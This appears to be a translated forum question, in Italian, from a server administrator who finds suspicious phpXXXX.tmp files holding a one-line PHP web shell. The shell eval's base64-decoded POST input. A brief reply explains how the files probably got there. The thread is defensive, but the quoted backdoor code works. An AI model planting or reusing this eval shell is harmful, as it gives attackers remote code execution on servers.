ho notato che la nostra directory temp ha un certo numero di quelli che sembrano essere i file temporanei con nomi come phpA3F9.tmpcodice PHP contenute nei file phpXXXX.tmp nella directory temp
Esaminando il contenuto trovo un numero seguito da qualche codice PHP, il seguente codice appare in diversi file
9990000
<?php
$mujj = $_POST['z']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); @eval("\$safedg = $xsser;"); } ?>
Questo sembra essere un tentativo di attacco, ma presumo si basa su l'attaccante in grado di eseguire il codice nella cartella tmp.
Qualcuno può spiegare cosa sta succedendo qui? Quali sono i rischi? Come si inseriscono questi file nella cartella tmp? E come posso fermarli?
Non so se è rilevante, ma ci sono in esecuzione di PHP 5.5 su IIS
Quel nome file mi ricorda i file temporanei MSIE –
Probabilmente vengono caricati sul server da un utente malintenzionato e, se il tuo "upload_tmp_dir" punta alla directory temporanea, sembra che qualcuno stia tentando di caricare codice dannoso sul server. Questi file vengono cancellati dopo l'esecuzione dello script. – vitozev